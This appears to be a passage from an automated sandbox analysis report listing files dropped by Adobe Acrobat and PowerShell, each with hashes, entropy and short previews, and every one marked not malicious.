C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.664790346530205
Encrypted:	false
SSDEEP:	24:Yv6XzzvniamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSd:YvYUBgkDMUJUAh8cvMd
MD5:	2464EC4E8506322C09D88042A2DAD0B7
SHA1:	9A1DC2F6FF5861E3D62EC8C947C5FD10EF9E6FC9
SHA-256:	3FAC74914153C5A81709735E77E1B0BAED1AB4D5288F554638BF749FD51B70C5
SHA-512:	0637F6E1581E1E98F65FADB18BB9B71C1E9AA9CB7BFF2E18EAF032BE325FEF85732FBE180E2C935129B15A6F9C00542B745718FBEA424540D1ECE4248D377167
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.283128706522224
Encrypted:	false
SSDEEP:	6:YEQXJ2HXPiXVoZcg1vRcR0YEz2DoAvJfshHHrPeUkwRe9:YvXKXPLZc0vjz2sGUUUkee9
MD5:	79ABF86ADE9F97B8F8A669387C3E42CE
SHA1:	F32A5C3A741E0811F1AFF61B278570BF0CA3D518
SHA-256:	A3DC426B9D495482DDF6251623BFC99E47117A3135A1EFB6C0D4587B383002E5
SHA-512:	5F073B934748288BA53A4D9A3453673897EC5B7E2C0CB587EEFE1C034F105B8956A8244759918F4D8F34FD663D492B0B205249F9BD0021458445337C8B835170
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.29426979727066
Encrypted:	false
SSDEEP:	6:YEQXJ2HXPiXVoZcg1vRcR0YEz2DoAvJTqgFCrPeUkwRe9:YvXKXPLZc0vjz2sGTq16Ukee9
MD5:	A4B76A163805615AEAFD582D4DB9E9F6
SHA1:	7939BD3F345AB01C1B5A8E773F3F9AF70FC2004C
SHA-256:	87E89EE67254249DEB673A92E88883E15338C386224533F9610A1FA832F6DE20
SHA-512:	96F1CDA98FFF17C2E6608DB4860B78D621C7EB96187C7FEC8EDE5FF8AD7E8538051D835252155E4B724DD605050ED9CD964105F61370C64D9C057B818768EA6A
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"ca95353c-4f04-41b3-86f0-7df9c0a2e11b","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734735968663,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.129437981246324
Encrypted:	false
SSDEEP:	48:YvgyhAozX0Htu+tjQCp1pqTOEDgwFmlaVlL/Y9dUvY:/yhAozX0Htu+tjQCp1e9MwFmcVlLOdAY
MD5:	2C21518A9ADB01C7520D0CDEAD11D364
SHA1:	554BFB535782BC488037B63200B17B7021C6ED1A
SHA-256:	431DFB725819059182AF6B3BCC99D4BC5122461351F8DAF43AFB5B38FAC4DE05
SHA-512:	14EF3FF855A117743D20077C85F3D6D53C7DE5D10ACBE175EA2889839D748C9C3CD5ECDEAFFAE9137E435CCFFF29144D83EBFF84B926679235D1C7974E339848
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"a75a843a8ceadd5d405ae54c2ad2b775","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734559582000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"1403ec105cdd5446fedc88476f6df4c3","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734559582000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"28dfb1ce0b0420c745d8015db5eaf0fc","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734559582000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"a6c9eafc548115b8b1420e34a7b89a6b","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1734559582000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"ee2c70488b939eeeb3d5da7d00eafe29","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734559582000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"2e61c42e3067a189f8d60e826ea57f6f","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.1858531498197218
Encrypted:	false
SSDEEP:	48:TGufl2GL7msEHUUUUUUUUlpSvR9H9vxFGiDIAEkGVvpRN:lNVmswUUUUUUUUz+FGSItr
MD5:	6EDD87E3F867C51058712CBA61F53440
SHA1:	BE4E58DA1DC83E3CEEC5C7A5C13B05A9DC9953AE
SHA-256:	3184A322E54ECEF37D08150793114B95DA2759ECC6AD3FCA8F719B50C8625C0E
SHA-512:	B47451DFA244A83E3F3344F1226958C6C77ACFBFAC195757A021CCAD4D46BB814B4ECCCCDB545FE5DEA8931BEBBF46F5AC854AD93031B8A946BBA87AD5D2194C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.6046300599509975
Encrypted:	false
SSDEEP:	48:7MGKUUUUUUUUUUlBvR9H9vxFGiDIAEkGVvuqFl2GL7ms5:7OUUUUUUUUUUPFGSItQKVms5
MD5:	3DA69EE963FDBF2A99F97E1392FEF6A1
SHA1:	CDA64196DD9077FA5986DA699786C4FDFD8D567D
SHA-256:	BF913883C1D6B59F138B69A2256111DE77632E44AF5DCC5ECB9E329389DE04EC
SHA-512:	00B81FC62E718D9A5A74A8966AB53B08A63CEF97E311E89075F8B974EFF1150DA2DC7091E3460A5DE56F9245FA3C574ECE2E36C8675977D52A4F98125CB3903E
Malicious:	false
Preview:	.... .c.....jc........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgHUH+RZlDnv6eZ3xUKFGv+HKDaYyu:6a6TZ44ADEHUeRZlDnvfHQaK
MD5:	B6BC88187F695CD71FED3EF9B7A40270
SHA1:	25BE84BB5D671DDCF96BCC52069F9138A3677037
SHA-256:	E3DB3B022FBB0E262052016E66E1D9EC34C89942BF8E2CE124C8D8F8DDCE3A3B
SHA-512:	53BFF37935297A14A71D74195E5D2F33530DC4FEE21109CEC5E0CD236337211BA44B05D7018CAC2533728EAFDB4BED2CA73003F359318F433CFA407310266C03
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	16954
Entropy (8bit):	5.037889810150987
Encrypted:	false
SSDEEP:	384:KVoGIpN6KQkj2lkjh4iUx8hQ+RardFH5OdBGNXp5YvOjJFYo:KV3IpNBQkj20h4iUx8hvRardFH5OdBGr
MD5:	439799044CE981325D1806188CC1A42C
SHA1:	6DC37C6D50FFCE0E875629DD3AB4EA2A549B68EF
SHA-256:	CC11B6C1AEFDC9C20D3E44BC9FE2D5EE6647D0D55A80217BFA1C743E8F81BBDF
SHA-512:	0786B3002913C8D5C242DC39275ADB5385673305AE457FA91CFA1F193307817B6085AE4FCC1C1FA600A48DD78EAE14C2FE58298CE8E4292BE1EB037ECA8FD1B7
Malicious:	false
Preview:	PSMODULECACHE.....m.\3.z..q...C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem........C.zJ.z..A...C:\Windows\System32\migwiz\replacementmanifests\SppMig\SppMig.dll............z..a...C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DeliveryOptimization\DeliveryOptimization.psd1........Get-DeliveryOptimizationLog....&...Get-DOPercentageMaxForegroundBandwidth....&...Set-DOPercentageMaxBackgroundBandwidth........Set-DeliveryOptimizationStatus.... ...Delete-DeliveryOptimizationCache....&...Set-DOPercentageMaxF

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1892
Entropy (8bit):	5.545169123941962
Encrypted:	false
SSDEEP:	48:MCRSU4y4RQmFoUeCamfm9qr9tqiNAJ8PB8Nfx49+x6l1InytO:MCwHyIFKL2O9qr+iNk8PBKfg+8Mn5
MD5:	548794B1984D08ECCE8CA77212401089
SHA1:	09DD2C06E084A31710E3B5524E5715AA42C5CB4B
SHA-256:	76343847EBB1DCC956A33BB7F283746B5878D454BEACE5A0AD3FB52550D9E1C0
SHA-512:	2E308DFD385C684F7D88B1969D56D141E534A5A4801F41F0B5069C919CA36087BC881ECA7B60876092AF5AD52E33461847619B1040039B3328D74CBE9AE342D1
Malicious:	false
Preview:	@...e...........h....................................@..........L..............@l..".E..9G.)........#.Microsoft.AppV.AppVClientPowerShell.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L................7.....H....X.P.....$.Microsoft.AppV.AppvClientCom

C:\Users\user\AppData\Local\Temp\MSIf5515.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.51161293806784
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8sKDaf:Qw946cPbiOxDlbYnuRKSc
MD5:	2F24E2B5CD96BD070A74F7F38880E85A
SHA1:	E8995ACA104BD4082A96412BE2E52C8ABD93339A
SHA-256:	1B05E71CC3F64C6926A265A5815050616C9895D1AF55CAD61AB89F5F34AC1FAD
SHA-512:	0AEE5F6664AE72CE1F80C5D42D3070B11F69E66568E357AFD0A3932134D0836E5B52CA16CA2E1AB6796CAF5972C484879B887C8E9669273A731169621768EA61
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.8./.1.2./.2.0.2.4. . .1.7.:.0.6.:.1.8. .=.=.=.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ynuomfx.yno.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crks3oxv.xyu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dt0yoql4.gtl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpckmecv.1sa.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdyragny.oly.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0hayfb3.bkf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-18 17-06-11-079.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.345946398610936
Encrypted:	false
SSDEEP:	384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
MD5:	8947C10F5AB6CFFFAE64BCA79B5A0BE3
SHA1:	70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
SHA-256:	4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
SHA-512:	B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
Malicious:	false
Preview:	SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.378107177335653
Encrypted:	false
SSDEEP:	384:Qoe9mAPVu3G4/qyX7NenbY5ZcMxYLC6wJGcwKiSrfpoLx4Up5WreD0IJAaIrs5Jf:iOK
MD5:	401B2AFB6F900C742861DF223770658C
SHA1:	14DEA2EFC978DB86802A2DEDC12D626C263EF7AF
SHA-256:	879708D769B42DD0653C39254A6A3C8BF32A198094160D86C5841BD9A1D39FB5
SHA-512:	DAFEB1C1C7CC0E974EDECEDEC5D36C785A3B5523C3D38664D2C7E0CBC1369F119733C6F404991F3D3F1B25D175EBE2E4FAA492154D7C3392C2B7C4932D8D5B66
Malicious:	false
Preview:	SessionID=ddcf347a-bf23-4378-904c-6d40735db91a.1734559571103 Timestamp=2024-12-18T17:06:11:103-0500 ThreadID=7836 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=ddcf347a-bf23-4378-904c-6d40735db91a.1734559571103 Timestamp=2024-12-18T17:06:11:113-0500 ThreadID=7836 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=ddcf347a-bf23-4378-904c-6d40735db91a.1734559571103 Timestamp=2024-12-18T17:06:11:113-0500 ThreadID=7836 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=ddcf347a-bf23-4378-904c-6d40735db91a.1734559571103 Timestamp=2024-12-18T17:06:11:113-0500 ThreadID=7836 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=ddcf347a-bf23-4378-904c-6d40735db91a.1734559571103 Timestamp=2024-12-18T17:06:11:113-0500 ThreadID=7836 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.392325653285185
Encrypted:	false
SSDEEP:	768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rG:C
MD5:	30AFE60E05F723D680463FD29D1AF22E
SHA1:	EED6CB29D66BC2586F703A129B0FA1C8DC807630
SHA-256:	C93DCA05D9DBCC2AB9BE8DEAC8C1E1D6E31C028A9D3EEB7885C75225EC415624
SHA-512:	2E882CF0C84752F6DE064AA87DB66AABF15D85519B35A148737DD4E5D699C0EFAB74B6CE251F5419C913E3058CF4BE4F28649650F3C64565ACB533BA7FF0BF18
Malicious:	false
Preview:	03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : *************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***********************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\3782ce8d-c914-47eb-81d7-6eca15b9efad.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 42290
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:NDbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WL07oXGZzwYIGNPJF:Jb3mlind9i4ufFXpAXkrfUs0jWLxXGZX
MD5:	D3D2927BC4723609B69F537AD83E856C
SHA1:	780A3D2C4FCB7C4126A7FD53AB72800403D150DD
SHA-256:	48452A955CE3D6335BF7EF76ACAB44968F637E4DDE10F49FD5C664EEC615DC8B
SHA-512:	401612E3FEBFDB49CE2F5A6095BEE8A18F9928AB9C8EEA60F07E291A2BDF4DAA3FA9AC8F5534C88C1E2DEBB90B915CDA74C9CC3A8267239CF068119D1E1EAB7E
Malicious:	false
